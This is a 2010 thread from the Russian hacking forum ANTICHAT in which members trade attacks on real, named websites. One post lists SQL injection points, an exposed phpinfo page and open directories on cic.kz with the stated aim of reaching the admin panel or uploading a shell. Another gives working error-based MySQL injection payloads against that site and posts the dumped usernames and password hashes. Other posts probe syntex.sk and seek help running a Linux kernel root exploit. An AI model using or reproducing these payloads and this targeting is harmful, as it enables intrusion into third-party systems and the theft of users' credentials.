ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.06.2010, 18:33
|
|
Познающий
Регистрация: 24.08.2009
Сообщений: 67
Провел на форуме:
137206
Репутация:
10
|
|
DrakonHaSh не работат. там есть заглушка на случай если файла нет на hdd, вот она показывается на data и php filter. возможно там пхп
|
|
|
19.06.2010, 19:51
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от -=ASSKAKO=-
-=ASSKAKO=- said:
имеется иньекция при авторизации
Код:
Code:
http://cic.kz/admin/login
иньекция в поле поиска:
Код:
Code:
http://cic.kz/search/
пхпинфо:
Код:
Code:
http://cic.kz/phpinfo.php
практически все каталоги\папки доступны к индексированию:
Код:
Code:
http://cic.kz/classes/
http://cic.kz/wysiwyg/
раскрытие пути:
Код:
Code:
http://cic.kz/userfiles/LAW/kz/
http://cic.kz/wysiwyg/plugins/images/connector/yoursessioncheck.php
также имеется руки растущие оттуда, откуда сижу...
цель: получить доступ в админку либо залить шелл. Проще некуда. В поле логин:
Без плюсов, только чистые пробелы.
Здравствуйте, Глеб. =)
|
|
|
|
19.06.2010, 21:47
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
а поле серч хекается при запросе
Код:
Code:
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
добавление :
Ну короче поахал себе мозг, вот что вышло
table : users (id,login.password)
gleb:609562b36985b13c69167ed9b3525c0a
VS:016d36db759cbd97f97b8f44d1586020
и т.д.
С хешами я хз, все вместились или нет
запрос
Код:
Code:
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)e)b)a)/**/and/**/'1'='1
вообще вот ) |
|
|
|
20.06.2010, 13:38
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Скажите есть какой-то софт для поиска админки на сайте?
Скуль хелпер не работает.
|
|
|
|
20.06.2010, 13:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от CyberHunter
CyberHunter said:
Скажите есть какой-то софт для поиска админки на сайте?
Скуль хелпер не работает.
|
|
|
|
20.06.2010, 16:30
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Помогите вывести версию БД.
http://www.syntex.sk/novinky.php?od=75+and+substring(version(),1,1)=5
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/html/syntex.sk/public_html/novinky.php on line 34
|
|
|
|
20.06.2010, 16:41
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
По моему там чтото типа такого:
SELECT * FROM mytable where od='.mysql_real_escape_string($_GET['od']).';
Поэтому когда ты ставишь ковычку или чтото ещё то запрос возвращает просто пустой результат)
там нет проверки mysql_num_rows, поэтому это не скуля
|
|
|
|
20.06.2010, 18:54
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Помогите воспользоваться руткитом.
Собираюсь получить права рут на Linux Kernel 2.6.5
Вроде бы нашел сплойт http://milw0rm.com/exploits/8556
А как воспользоваться чётко незнаю.
|
|
|
|
20.06.2010, 19:47
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
Сообщение от None
Помогите воспользоваться руткитом.
Собираюсь получить права рут на Linux Kernel 2.6.5
Вроде бы нашел сплойт http://milw0rm.com/exploits/8556
А как воспользоваться чётко незнаю.
Ну, во-первых, это не руткит.
А как использовать можно найти в блоге автора - http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html В частности для компиляции нужны хедеры libsctp (пакет libsctp-dev для дебиана, например).
|
|
|
|
20.06.2010, 23:58
|
|
Познающий
Регистрация: 13.04.2010
Сообщений: 42
Провел на форуме:
460968
Репутация:
81
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO counter (ip,cookie,date) values('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]session_id[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"',NOW())"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
уязвим ли данный код?(mq-off) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?2213912){kind=avatar}
![Отправить сообщение для [x60]unu с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
